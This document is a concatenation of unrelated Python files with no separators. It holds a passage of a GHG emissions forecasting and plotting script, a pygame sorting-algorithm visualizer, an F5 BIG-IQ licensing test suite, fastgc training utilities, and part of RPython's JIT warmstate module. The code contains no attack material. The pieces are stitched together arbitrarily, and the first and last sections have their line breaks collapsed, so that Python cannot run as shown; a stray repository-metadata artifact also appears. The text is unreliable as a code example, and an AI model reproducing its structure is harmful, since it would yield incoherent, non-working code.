along with corresponding full energy forecast from same model plt.figure(36) plt.plot(basis, US_commercial_GHG, label = 'Commercial Subsector', color = cm(30)) plt.plot(basis, US_residential_GHG, label = 'Residential Subsector', color = cm(60)) plt.plot(basis, US_industrial_GHG, label = 'Industrial Subsector', color = cm(90)) plt.plot(basis, US_transportation_GHG, label = 'Transportation Subsector', color = cm(120)) plt.plot(basis, US_electric_GHG, label = 'Electric Power Subsector', color = cm(150)) plt.plot(basis, US_fugitive_GHG, label = 'Fugitive Emissions', color = cm(180)) plt.plot(basis, US_energy_GHG, label = 'Energy Production - Total', color = cm(210)) # Add titles and save plt.title('Subsector Level GHG Emissions', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 9, ncol = 2) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/subsector_plots.eps') plt.figure(72) plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/agg_subsector_v_sector.eps') # Testing the various models for aggregated in-sample data fitting # Calculate the data mean Y_bar = [sum(Y_Energy)/len(Y_Energy)]*len(Y_Energy) # Calculate aggregate predicted values agg_val = electric_results.fittedvalues + transportation_results.fittedvalues + industrial_results.fittedvalues + commercial_results.fittedvalues + residential_results.fittedvalues + fugitive_results.fittedvalues # Calculate SSR agg_sr = 
(agg_val - Y_bar)**2 agg_ssr = sum(agg_sr) # Calculate SSTO agg_sto = (Y_Energy - Y_bar)**2 agg_ssto = sum(agg_sto) # Calculate $R^{2}$ agg_r2 = agg_ssr / agg_ssto # Calculate Adjusted $R^{2}$ agg_ar2 = 1 - ((1 - agg_r2) * ((len(Y_Energy) - 1) / (len(Y_Energy) - (energy_results.df_model + 1)))) # Get Adjusted $R^{2}$ from independent energy sector models ind_ar2 = energy_results.rsquared_adj # Create dataframe of results and write to file models = pd.DataFrame(['AR-1 EKC Model']) ind = pd.DataFrame([ind_ar2]) agg = pd.DataFrame([agg_ar2]) adj_r2_df = pd.concat([models, ind, agg], axis = 1) adj_r2_df.columns = ['Model', 'Independent', 'Aggregate'] adj_r2_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/adjusted_rsquared.txt', index = False) plt.figure(80) base2 = [i for i in range(1991,2012)] plt.plot(base2, historical, label = 'Historical US Energy Sector GHG Emissions', color = 'black') plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forcecasts_with_historical_data.eps') # Validating the forecast with EPA data # Loading the EPA Data epadata = pd.read_csv(epapath) # Extracting the non-agricultural total GHG emissions from the EPA data and regressing it against WRI historical data EPA = epadata.Non_Ag[1:len(historical)+1] EPA = stats.add_constant(EPA) val_mod = stats.OLS(historical, EPA) val_res = val_mod.fit() print(val_res.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/validation_results.txt', 'w') 
file.write(val_res.summary().as_text()) file.close() # Testing forecasts against future EPA data as a validation measure # Scaling EPA data per above regression a = val_res.params['const'] b = val_res.params['Non_Ag'] future_epa = epadata.Non_Ag[len(historical)+1::] future_epa = future_epa*b + a # Plots epaplot = epadata.Non_Ag[1::]*b + a plt.figure(figsize = (8,5)) plt.ylim(bottom = 4000, top = 6500) base2 = [i for i in range(1991,2012)] base3 = [i for i in range(1991,2018)] plt.plot(base2, historical, label = 'Historical US Energy Sector GHG Emissions', color = 'black') plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) plt.plot(base3, epaplot, label = 'EPA Data', color = cm(240)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector\n(Linear GDP Model)', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forcecasts_with_historical_data_linear.eps') # Generating statistics on forecast accuracy sector = US_energy_GHG[0:6] subsectors = subsector_aggregated[0:6] secs = [(future_epa[i+22] - sector[i])**2 for i in range(len(sector))] subs = [(future_epa[i+22] - subsectors[i])**2 for i in range(len(sector))] MSE_sector = (1 / len(sector)) * sum(secs) MSE_subs = (1 / len(sector)) * sum(subs) print(MSE_sector) print(MSE_subs)
from table import Table
from data import Data
import pygame


class Algorithm:
    """Runs a named sorting algorithm over a Table of Data bars,
    redrawing the table as it goes to animate the sort.

    BUG FIXES vs. original:
    * ``fusion_sort`` was dead code trapped inside a triple-quoted string
      (so ``run("Fusion Sort")`` raised AttributeError); it is restored as
      a real method.
    * the restored merge split ``[:N//2]`` / ``[N//2+1:]`` dropped the
      middle element; the second slice now starts at ``N//2``.
    * ``bubble_sort`` used highlight color ``(255, 120, 12)`` where every
      other algorithm uses ``(255, 120, 120)`` — assumed a typo and fixed.
    """

    def __init__(self, algo, win=None):
        # algo: display name of the algorithm ("Insertion Sort", ...)
        # win: optional pygame surface (unused here; Table does the drawing)
        self.algo = algo
        self.win = win

    def run(self, table):
        """Dispatch to the sorting method selected by ``self.algo``."""
        if self.algo == "Insertion Sort":
            return self.insertion_sort(table)
        if self.algo == "Quick Sort":
            return self.quick_sort(table)
        if self.algo == "Fusion Sort":
            return self.fusion_sort(table)
        if self.algo == "Bubble Sort":
            return self.bubble_sort(table)

    def insertion_sort(self, table):
        """In-place insertion sort, highlighting the moving value."""
        n = len(table.data)
        for i in range(n):
            value = table.data[i].value
            j = i
            # shift larger elements right, redrawing each move
            while j > 0 and table.data[j - 1].value > value:
                table.data[j] = Data(table.data[j - 1].value, (255, 120, 120))
                table.draw()
                j -= 1
            # restore the default color on everything we shifted
            for e in range(j, i):
                table.data[e].set_color()
            table.data[j] = Data(value, (255, 120, 120))
            table.draw()
            table.data[j].set_color()
        table.draw()

    def quick_sort(self, table):
        """In-place Lomuto-partition quicksort with animated swaps."""
        def swap(arr, i, j):
            # swap two entries and flash them highlighted for one frame
            arr[i], arr[j] = arr[j], arr[i]
            table.data[i].set_color((255, 120, 120))
            table.data[j].set_color((255, 120, 120))
            table.draw()
            table.data[i].set_color()
            table.data[j].set_color()
            return arr

        def partition(arr, low, high):
            # Lomuto partition; the pivot (arr[high]) is shown in yellow
            i = low - 1
            pivot = arr[high].value
            table.data[high].set_color((255, 255, 100))
            table.draw()
            for j in range(low, high):
                if arr[j].value <= pivot:
                    i = i + 1
                    arr = swap(arr, i, j)
            arr = swap(arr, i + 1, high)
            table.data[high].set_color()
            return i + 1

        def quickSort(arr, low, high):
            if low < high:
                pi = partition(arr, low, high)
                arr = quickSort(arr, low, pi - 1)
                arr = quickSort(arr, pi + 1, high)
            return arr

        return quickSort(table.data, 0, len(table.data) - 1)

    def bubble_sort(self, table):
        """In-place bubble sort with early exit when a pass makes no swap."""
        for i in range(len(table.data) - 1, 0, -1):
            sorted_ = True
            table.data[i].set_color((255, 255, 120))
            for j in range(0, i):
                if table.data[j + 1].value < table.data[j].value:
                    table.data[j + 1], table.data[j] = table.data[j], table.data[j + 1]
                    sorted_ = False
                    # was (255, 120, 12) — fixed to match the sibling methods
                    table.data[j + 1].set_color((255, 120, 120))
                    table.draw()
                    table.data[j + 1].set_color()
            table.data[i].set_color()
            if sorted_:
                return

    def fusion_sort(self, table):
        """Recursive merge ("fusion") sort, restored from dead code.

        Builds a new sorted list and writes it back to ``table.data`` so
        the table ends up sorted like the in-place algorithms.
        """
        from time import sleep

        def fusion(A, B):
            sleep(0.2)  # pacing so each comparison is visible
            if len(A) == 0:
                return B
            if len(B) == 0:
                return A
            A[0].set_color((255, 120, 120))
            B[0].set_color((255, 120, 120))
            table.draw()
            A[0].set_color()
            B[0].set_color()
            if A[0].value <= B[0].value:
                return [A[0]] + fusion(A[1:], B)
            return [B[0]] + fusion(A, B[1:])

        def _fusionsort(array):
            if len(array) <= 1:
                return array
            mid = len(array) // 2
            # BUG FIX: second half starts at mid (original used mid + 1,
            # silently dropping array[mid] from the result)
            return fusion(_fusionsort(array[:mid]), _fusionsort(array[mid:]))

        table.data = _fusionsort(table.data)
        table.draw()
        return table.data
# Copyright 2015-2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import pytest
import time

from pytest import symbols


SKIPIF_MANAGED_DEVICE_MESSAGE = """
You must opt-in to run BIG-IQ license tests. To run them, set the symbols
variable 'run_biq_license_tests' to 'True' and the 'biq_bigip_managed_device'
variable to the IP address of the BIG-IP to license.
"""

SKIPIF_UNMANAGED_DEVICE_MESSAGE = """
You must opt-in to run BIG-IQ license tests. To run them, set the symbols
variable 'run_biq_license_tests' to 'True' and the 'biq_bigip_unmanaged_device'
variable to the IP address of the BIG-IP to license.
"""

# Every test in this module is skipped unless the test symbols opt in to
# the (destructive, hardware-touching) licensing tests.
MISSING_SYMBOLS_LICENSE = True
if hasattr(symbols, 'run_biq_license_tests'):
    if symbols.run_biq_license_tests is True:
        MISSING_SYMBOLS_LICENSE = False

pytestmark = pytest.mark.skipif(
    MISSING_SYMBOLS_LICENSE,
    reason="You must opt-in to run BIG-IQ license tests."
           "To run them, set the symbols variable "
           "'run_biq_license_tests: True'"
)


# NOTE(review): this fixture name shadows the builtin ``license``; pytest
# resolves fixtures by name so it works, but renaming would be safer.
@pytest.fixture(scope="function")
def license(mgmt_root):
    """Creates a license pool to put license offerings in

    Note that in BIG-IQ 5.1.0 you are able to delete a regkey pool
    even if it has existing regkeys in it.

    :param mgmt_root:
    :return:
    """
    collection = mgmt_root.cm.device.licensing.pool.regkey.licenses_s
    resource = collection.licenses.create(
        name='foo'
    )
    yield resource
    resource.delete()


@pytest.fixture(scope='function')
def licenses(mgmt_root):
    """Return the current collection of regkey license pools."""
    licensing = mgmt_root.cm.device.licensing
    collection = licensing.pool.regkey.licenses_s.get_collection()
    return collection


def wait_for_status(obj, status):
    """Poll *obj* (refreshing it) until it reaches *status*.

    Gives up silently after ~60 seconds; callers assert on the final
    status themselves.
    """
    for x in range(60):
        obj.refresh()
        if obj.status == status:
            return
        time.sleep(1)


@pytest.fixture(scope='function')
def offering(license):
    """Create an activated license offering inside the pool fixture."""
    resource = license.offerings_s.offerings.create(
        regKey=symbols.biq_license_regkey,
        status="ACTIVATING_AUTOMATIC"
    )
    wait_for_status(resource, 'READY')
    yield resource
    resource.delete()


class TestLicensePoolRegkeyCollection(object):
    def test_get_collection(self, licenses):
        """A fresh system has no regkey license pools."""
        assert len(licenses) == 0


class TestLicensePoolRegkey(object):
    def test_create_v12_license(self, license):
        """Activate a regkey offering, accepting the EULA if prompted."""
        resource = license.offerings_s.offerings.create(
            regKey=symbols.biq_license_regkey,
            status="ACTIVATING_AUTOMATIC"
        )
        try:
            # Poll for up to 60s; activation may pause waiting for an
            # explicit EULA acceptance, which we supply.
            for x in range(60):
                resource.refresh()
                if resource.status == 'READY':
                    break
                elif resource.status == 'ACTIVATING_AUTOMATIC_NEED_EULA_ACCEPT':
                    resource.modify(
                        status='ACTIVATING_AUTOMATIC_EULA_ACCEPTED',
                        eulaText=resource.eulaText
                    )
                time.sleep(1)
            assert resource.status == 'READY'
            assert resource.regKey == symbols.biq_license_regkey
        finally:
            resource.delete()


class TestDeviceLicensing(object):
    @pytest.mark.skipif(
        not hasattr(symbols, 'biq_bigip_unmanaged_device_v13'),
        reason=SKIPIF_UNMANAGED_DEVICE_MESSAGE
    )
    def test_license_unmanaged_device_v13(self, offering):
        """License an unmanaged v13 BIG-IP from the offering, then revoke."""
        resource = offering.members_s.members.create(
            deviceAddress=symbols.biq_bigip_unmanaged_device_v13,
            username="admin",
            password="<PASSWORD>",
            httpsPort=8443
        )
        wait_for_status(resource, 'LICENSED')

        try:
            assert resource.status == 'LICENSED'
            assert resource.deviceAddress == symbols.biq_bigip_unmanaged_device_v13
        finally:
            # revoking requires re-supplying credentials
            resource.delete(
                id=resource.id,
                username='admin',
                password='<PASSWORD>'
            )

    # TODO(Add managed licensing once we have added the /mgmt/cm/global/tasks/device-trust API)
    # @pytest.mark.skipif(
    #     not hasattr(symbols, 'biq_bigip_managed_device'),
    #     reason=SKIPIF_MANAGED_DEVICE_MESSAGE
    # )
    # def test_license_managed_device(self, offering):
    #     resource = offering.members_s.members.create(
    #         deviceAddress=symbols.biq_bigip_unmanaged_device,
    #         username="admin",
    #         password="<PASSWORD>",
    #     )
    #     wait_for_status(resource, 'LICENSED')
    #
    #     try:
    #         assert resource.status == 'LICENSED'
    #         assert resource.deviceAddress == symbols.biq_bigip_unmanaged_device
    #     finally:
    #         resource.delete(
    #             id=resource.id,
    #             username='admin',
    #             password='<PASSWORD>'
    #         )
"""Utility helpers for the fastgc experiments: GPU setup, gradient
clipping, CLI parsing, privacy accounting, and result formatting.

Fixes vs. original:
* removed the stray ``<gh_stars>1-10`` artifact (a syntax error);
* ``check_gpu_memory`` now restores the working directory in a
  ``finally`` (it previously stayed chdir'ed if nvidia-smi failed);
* project imports (dataset loaders, ``act_func_list``) are deferred to
  the functions that use them so this module imports on its own.
"""
import argparse
import sys
import os
import subprocess

import numpy as np
import pandas as pd
import torch


def check_gpu_memory():
    """Return per-GPU used memory in MiB, as reported by ``nvidia-smi``.

    :return: list of ints, one per visible GPU, in device order.
    :raises subprocess.CalledProcessError: if nvidia-smi fails.
    """
    curr_dir = os.getcwd()
    is_win32 = (sys.platform == "win32")
    try:
        if is_win32:
            # On Windows, assume 'nvidia-smi.exe' lives in the default
            # NVSMI install dir (it is usually not on PATH); chdir so the
            # bare command resolves.
            nvsmi_dir = r"C:\Program Files\NVIDIA Corporation\NVSMI"
            os.chdir(nvsmi_dir)
        result = subprocess.check_output(['nvidia-smi',
                                          '--query-gpu=memory.used',
                                          '--format=csv,nounits,noheader'],
                                         encoding='utf-8')
    finally:
        # BUG FIX: restore the cwd even when check_output raises
        if is_win32:
            os.chdir(curr_dir)

    gpu_memory = [int(x) for x in result.strip().split('\n')]
    return gpu_memory


def cuda_setup(is_deterministic, gpu_idx=-1):
    """Create a torch device (GPU when available) plus DataLoader kwargs.

    :param is_deterministic: when True, leave cudnn benchmarking disabled
        so results are reproducible.
    :param gpu_idx: GPU ordinal to use; -1 picks a default.
    :return: (device, dataloader_kwargs)
    """
    use_cuda = torch.cuda.is_available()
    kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {}

    if use_cuda:
        if gpu_idx < 0:
            # NOTE(review): "pick the emptiest GPU" selection is disabled;
            # GPU 0 is always used for a negative index.
            # memory_usage = check_gpu_memory()
            # gpu_idx = np.argmin(memory_usage)
            gpu_idx = 0

        device = torch.device("cuda:{}".format(gpu_idx))
        if not is_deterministic:
            torch.backends.cudnn.benchmark = True
    else:
        device = torch.device("cpu")

    return device, kwargs


def copy_weight_values(models):
    """Copy the parameters of ``models[0]`` into ``models[1:]`` in place.

    Relies on ``state_dict()`` returning references to the live tensors,
    so ``copy_`` mutates the target models. Only matching names are
    copied.
    """
    model_states = [models[i].state_dict() for i in range(1, len(models))]

    for name, param in models[0].state_dict().items():
        for model_state in model_states:
            if name in model_state:
                model_state[name].copy_(param)


def clip_tensor(data, clip_thresh):
    """L2-clip each example (first dimension) of *data* in place.

    Rows whose flattened L2 norm exceeds *clip_thresh* are rescaled to
    norm exactly *clip_thresh*; other rows are untouched.
    """
    batch_size = data.shape[0]
    x = data.view(batch_size, -1)  # view shares storage with `data`
    data_norm = torch.norm(x, dim=1).detach()
    to_clip = data_norm > clip_thresh
    x[to_clip] = x[to_clip] * clip_thresh
    x[to_clip] /= data_norm[to_clip].unsqueeze(1)


def argument_parser():
    """Build the command-line parser for the fast per-example-grad runs."""
    # deferred project import so this module loads without fastgc installed
    from fastgc.activation import act_func_list

    parser = argparse.ArgumentParser(description='fast per-example grad')
    parser.add_argument('--data_dir', type=str, default='./datasets')
    parser.add_argument('--dname', type=str, default='mnist',
                        choices=['mnist', 'cifar10', 'fmnist', 'lsun'])
    parser.add_argument('--train_alg', type=str, default='batch',
                        choices=['batch', 'reweight', 'naive'])
    parser.add_argument('--model_name', type=str, default='MLP',
                        choices=['MLP', 'CNN', 'RNN', 'LSTM', 'Transformer',
                                 'resnet18', 'resnet34', 'resnet50',
                                 'resnet101', 'vgg11', 'vgg13', 'vgg16',
                                 'vgg19'])
    parser.add_argument('--hidden_size', type=int, default=128)
    parser.add_argument('--hidden_sizes', nargs='+', type=int,
                        default=[128, 256])
    parser.add_argument('--channel_sizes', nargs='+', type=int,
                        default=[20, 50])
    parser.add_argument('--kernel_sizes', nargs='+', type=int,
                        default=[5, 5])
    parser.add_argument('--fc_sizes', nargs='+', type=int, default=[128])
    parser.add_argument('--batch_size', type=int, default=128)
    parser.add_argument('--clip_thresh', type=float, default=1.0)
    parser.add_argument('--test_batch_size', type=int, default=512)
    parser.add_argument('--act_func', type=str, default='sigmoid',
                        choices=act_func_list)
    parser.add_argument('--optimizer', type=str, default='Adam',
                        choices=['Adam', 'SGD', 'RMSprop'])
    parser.add_argument('--lr', type=float, default=0.001)
    parser.add_argument('--sigma', type=float, default=0.005)
    parser.add_argument('--delta', type=float, default=1e-5)
    parser.add_argument('--rep', type=int, default=10)
    parser.add_argument('--deterministic', action='store_true')
    parser.add_argument('--epochs', type=int, default=100)
    parser.add_argument('--verbose', action='store_true')
    parser.add_argument('--img_size', type=int, default=256)  # only for LSUN dataset

    # for transformer network
    parser.add_argument("--embedding_size", type=int, default=200,
                        help="length of embedding vectors")
    parser.add_argument("--max_vocab_size", type=int, default=50_000,
                        help="Number of words in the vocabulary.")
    parser.add_argument("--num_layers", type=int, default=1,
                        help="number of layers")
    parser.add_argument("--num_heads", type=int, default=8,
                        help="number of attention heads")
    parser.add_argument("--max_seq_len", help="Max sequence length.",
                        default=512, type=int)
    parser.add_argument("--niter", type=int, default=-1)
    # parser.add_argument("--download", action='store_true')
    parser.add_argument("--download", type=bool, default=True)
    parser.add_argument("--gpu_id", help="gpu_id to use", default=-1,
                        type=int)

    return parser


def float_to_string(value):
    """Render *value* with the decimal point removed (0.005 -> '0005')."""
    str_val = "{0}".format(value).replace('.', '')
    return str_val


def conv_outsize(in_size, kernel_size, padding, stride):
    """Output spatial size of a convolution: (in - k + 2p) // stride + 1."""
    out_size = (in_size - kernel_size + (2 * padding)) // stride
    out_size += 1
    return out_size


def compute_epsilon(clip_thresh, delta, sigma, batch_size, epochs):
    """Compute (alpha, rdp_eps, eps) privacy parameters via RDP accounting.

    Returns zeros when clipping or noise is disabled (clip_thresh <= 0 or
    sigma <= 0), i.e. no meaningful privacy guarantee.
    """
    if clip_thresh <= 0 or sigma <= 0:
        return 0.0, 0.0, 0.0

    sens = clip_thresh / batch_size  # per-step sensitivity
    log_delta = np.log(1. / delta)
    alpha = 1. + sigma * np.sqrt(2 * log_delta) / (sens * epochs)
    rdp_eps = alpha * epochs * (sens ** 2) / (2 * (sigma ** 2))
    eps = rdp_eps + log_delta / (alpha - 1.0)

    return alpha, rdp_eps, eps


def format_result(loss, acc, etime=None):
    """Format aligned '<loss> <acc> [<time>]' columns for each epoch."""
    if etime is None:
        str_result = ["{0:9.5f} {1:6.2f} {2:6s}".format(l, a, ' ')
                      for l, a in zip(loss, acc)]
    else:
        str_result = ["{0:9.5f} {1:6.2f} {2:6.3f}".format(l, a, t)
                      for l, a, t in zip(loss, acc, etime)]

    return ' '.join(str_result)


def io_setup(args, kwargs):
    """Load the dataset named in *args* and derive model I/O sizes.

    :return: (train_loader, test_loader, input_size, output_size,
        embeddings) — embeddings is None for non-Transformer models.
    """
    # deferred project imports (see module docstring)
    from fastgc.dataset.img_data import load_dataset
    from fastgc.dataset.text_data import load_imdb

    # loading data
    if args.model_name == 'Transformer':
        train_loader, test_loader, input_size, output_size, embeddings = load_imdb(args)
        args.dname = 'IMDB'
    else:
        train_loader, test_loader = load_dataset(args, kwargs)
        embeddings = None

        if args.model_name == 'MLP':
            input_size = train_loader.dataset[0][0].view(-1).size(0)
        elif args.model_name in ('RNN', 'LSTM'):
            C, H, W = train_loader.dataset[0][0].shape
            input_size = C * W
        else:
            input_size = train_loader.dataset[0][0].size(1)  # assume C x H x W and H=W

        output_size = len(train_loader.dataset.classes)

    if args.model_name == 'CNN':
        # prepend the input channel count for the first conv layer
        args.channel_sizes = [train_loader.dataset[0][0].size(0)] + args.channel_sizes

    return train_loader, test_loader, input_size, output_size, embeddings


def arrays_to_dataframe(tr_loss, tr_acc, te_loss, te_acc, etime, eps=None):
    """Assemble per-epoch metric arrays into a DataFrame.

    The 'epoch' column (1-based) is moved to the front; 'eps' is included
    only when given.
    """
    # converting into dataframes
    perf = {
        'tr_loss': tr_loss,
        'te_loss': te_loss,
        'tr_acc': tr_acc,
        'te_acc': te_acc,
        'etime': etime,
    }
    if eps is not None:
        perf['eps'] = eps

    df = pd.DataFrame(perf)
    df['epoch'] = range(1, len(df) + 1)

    # move the 'epoch' column (added last) to the front
    cols = df.columns.tolist()
    cols = cols[-1:] + cols[:-1]
    df = df[cols]

    return df


def get_filename(args):
    """Build an output-file stem encoding the main hyper-parameters."""
    filename = '{}_{}_B{}E{}C{}SIG{}'.format(args.model_name, args.dname,
                                             args.batch_size, args.epochs,
                                             float_to_string(args.clip_thresh),
                                             float_to_string(args.sigma))
    return filename
<gh_stars>1-10 import sys, weakref from rpython.rtyper.lltypesystem import lltype, llmemory, rstr, rffi from rpython.rtyper.ootypesystem import ootype from rpython.rtyper.annlowlevel import hlstr, cast_base_ptr_to_instance from rpython.rtyper.annlowlevel import cast_object_to_ptr from rpython.rlib.objectmodel import specialize, we_are_translated, r_dict from rpython.rlib.rarithmetic import intmask from rpython.rlib.nonconst import NonConstant from rpython.rlib.unroll import unrolling_iterable from rpython.rlib.jit import PARAMETERS from rpython.rlib.jit import BaseJitCell from rpython.rlib.debug import debug_start, debug_stop, debug_print from rpython.jit.metainterp import history from rpython.jit.codewriter import support, heaptracker, longlong from rpython.tool.sourcetools import func_with_new_name # ____________________________________________________________ @specialize.arg(0) def specialize_value(TYPE, x): """'x' must be a Signed, a GCREF or a FLOATSTORAGE. This function casts it to a more specialized type, like Char or Ptr(..). 
""" INPUT = lltype.typeOf(x) if INPUT is lltype.Signed: if isinstance(TYPE, lltype.Ptr) and TYPE.TO._gckind == 'raw': # non-gc pointer return rffi.cast(TYPE, x) elif TYPE is lltype.SingleFloat: return longlong.int2singlefloat(x) else: return lltype.cast_primitive(TYPE, x) elif INPUT is longlong.FLOATSTORAGE: if longlong.is_longlong(TYPE): return rffi.cast(TYPE, x) assert TYPE is lltype.Float return longlong.getrealfloat(x) else: return lltype.cast_opaque_ptr(TYPE, x) @specialize.ll() def unspecialize_value(value): """Casts 'value' to a Signed, a GCREF or a FLOATSTORAGE.""" if isinstance(lltype.typeOf(value), lltype.Ptr): if lltype.typeOf(value).TO._gckind == 'gc': return lltype.cast_opaque_ptr(llmemory.GCREF, value) else: adr = llmemory.cast_ptr_to_adr(value) return heaptracker.adr2int(adr) elif isinstance(lltype.typeOf(value), ootype.OOType): return ootype.cast_to_object(value) elif isinstance(value, float): return longlong.getfloatstorage(value) else: return lltype.cast_primitive(lltype.Signed, value) @specialize.arg(0) def unwrap(TYPE, box): if TYPE is lltype.Void: return None if isinstance(TYPE, lltype.Ptr): if TYPE.TO._gckind == "gc": return box.getref(TYPE) else: return llmemory.cast_adr_to_ptr(box.getaddr(), TYPE) if isinstance(TYPE, ootype.OOType): return box.getref(TYPE) if TYPE == lltype.Float: return box.getfloat() else: return lltype.cast_primitive(TYPE, box.getint()) @specialize.ll() def wrap(cpu, value, in_const_box=False): if isinstance(lltype.typeOf(value), lltype.Ptr): if lltype.typeOf(value).TO._gckind == 'gc': value = lltype.cast_opaque_ptr(llmemory.GCREF, value) if in_const_box: return history.ConstPtr(value) else: return history.BoxPtr(value) else: adr = llmemory.cast_ptr_to_adr(value) value = heaptracker.adr2int(adr) # fall through to the end of the function elif isinstance(lltype.typeOf(value), ootype.OOType): value = ootype.cast_to_object(value) if in_const_box: return history.ConstObj(value) else: return history.BoxObj(value) elif 
(isinstance(value, float) or longlong.is_longlong(lltype.typeOf(value))): if isinstance(value, float): value = longlong.getfloatstorage(value) else: value = rffi.cast(lltype.SignedLongLong, value) if in_const_box: return history.ConstFloat(value) else: return history.BoxFloat(value) elif isinstance(value, str) or isinstance(value, unicode): assert len(value) == 1 # must be a character value = ord(value) elif lltype.typeOf(value) is lltype.SingleFloat: value = longlong.singlefloat2int(value) else: value = intmask(value) if in_const_box: return history.ConstInt(value) else: return history.BoxInt(value) @specialize.arg(0) def equal_whatever(TYPE, x, y): if isinstance(TYPE, lltype.Ptr): if TYPE.TO is rstr.STR or TYPE.TO is rstr.UNICODE: return rstr.LLHelpers.ll_streq(x, y) if TYPE is ootype.String or TYPE is ootype.Unicode: return x.ll_streq(y) return x == y @specialize.arg(0) def hash_whatever(TYPE, x): # Hash of lltype or ootype object. # Only supports strings, unicodes and regular instances, # as well as primitives that can meaningfully be cast to Signed. 
if isinstance(TYPE, lltype.Ptr) and TYPE.TO._gckind == 'gc': if TYPE.TO is rstr.STR or TYPE.TO is rstr.UNICODE: return rstr.LLHelpers.ll_strhash(x) # assumed not null else: if x: return lltype.identityhash(x) else: return 0 elif TYPE is ootype.String or TYPE is ootype.Unicode: return x.ll_hash() elif isinstance(TYPE, ootype.OOType): if x: return ootype.identityhash(x) else: return 0 else: return rffi.cast(lltype.Signed, x) class JitCell(BaseJitCell): # the counter can mean the following things: # counter >= 0: not yet traced, wait till threshold is reached # counter == -1: there is an entry bridge for this cell # counter == -2: tracing is currently going on for this cell counter = 0 dont_trace_here = False extra_delay = chr(0) wref_procedure_token = None def get_procedure_token(self): if self.wref_procedure_token is not None: token = self.wref_procedure_token() if token and not token.invalidated: return token return None def set_procedure_token(self, token): self.wref_procedure_token = self._makeref(token) def _makeref(self, token): assert token is not None return weakref.ref(token) # ____________________________________________________________ class WarmEnterState(object): THRESHOLD_LIMIT = sys.maxint // 2 def __init__(self, warmrunnerdesc, jitdriver_sd): "NOT_RPYTHON" self.warmrunnerdesc = warmrunnerdesc self.jitdriver_sd = jitdriver_sd if warmrunnerdesc is not None: # for tests self.cpu = warmrunnerdesc.cpu try: self.profiler = warmrunnerdesc.metainterp_sd.profiler except AttributeError: # for tests self.profiler = None # initialize the state with the default values of the # parameters specified in rlib/jit.py for name, default_value in PARAMETERS.items(): meth = getattr(self, 'set_param_' + name) meth(default_value) def _compute_threshold(self, threshold): if threshold <= 0: return 0 # never reach the THRESHOLD_LIMIT if threshold < 2: threshold = 2 return (self.THRESHOLD_LIMIT // threshold) + 1 # the number is at least 1, and at most about half THRESHOLD_LIMIT 
    def set_param_threshold(self, threshold):
        # loop-entry threshold -> counter increment (see _compute_threshold)
        self.increment_threshold = self._compute_threshold(threshold)

    def set_param_function_threshold(self, threshold):
        # whole-function compilation threshold -> counter increment
        self.increment_function_threshold = self._compute_threshold(threshold)

    def set_param_trace_eagerness(self, value):
        self.trace_eagerness = value

    def set_param_trace_limit(self, value):
        self.trace_limit = value

    def set_param_inlining(self, value):
        self.inlining = value

    def set_param_enable_opts(self, value):
        # Parse a colon-separated list of optimization names into a dict
        # used as a set; None/'all' enables every optimization.
        from rpython.jit.metainterp.optimizeopt import ALL_OPTS_DICT, ALL_OPTS_NAMES

        d = {}
        if NonConstant(False):
            value = 'blah'  # not a constant ''
        if value is None or value == 'all':
            value = ALL_OPTS_NAMES
        for name in value.split(":"):
            if name:
                if name not in ALL_OPTS_DICT:
                    raise ValueError('Unknown optimization ' + name)
                d[name] = None
        self.enable_opts = d

    def set_param_loop_longevity(self, value):
        # note: it's a global parameter, not a per-jitdriver one
        if (self.warmrunnerdesc is not None and
                self.warmrunnerdesc.memory_manager is not None):   # all for tests
            self.warmrunnerdesc.memory_manager.set_max_age(value)

    def set_param_retrace_limit(self, value):
        if self.warmrunnerdesc:
            if self.warmrunnerdesc.memory_manager:
                self.warmrunnerdesc.memory_manager.retrace_limit = value

    def set_param_max_retrace_guards(self, value):
        if self.warmrunnerdesc:
            if self.warmrunnerdesc.memory_manager:
                self.warmrunnerdesc.memory_manager.max_retrace_guards = value

    def set_param_max_unroll_loops(self, value):
        if self.warmrunnerdesc:
            if self.warmrunnerdesc.memory_manager:
                self.warmrunnerdesc.memory_manager.max_unroll_loops = value

    def disable_noninlinable_function(self, greenkey):
        # Permanently mark this position as not worth tracing/inlining.
        cell = self.jit_cell_at_key(greenkey)
        cell.dont_trace_here = True
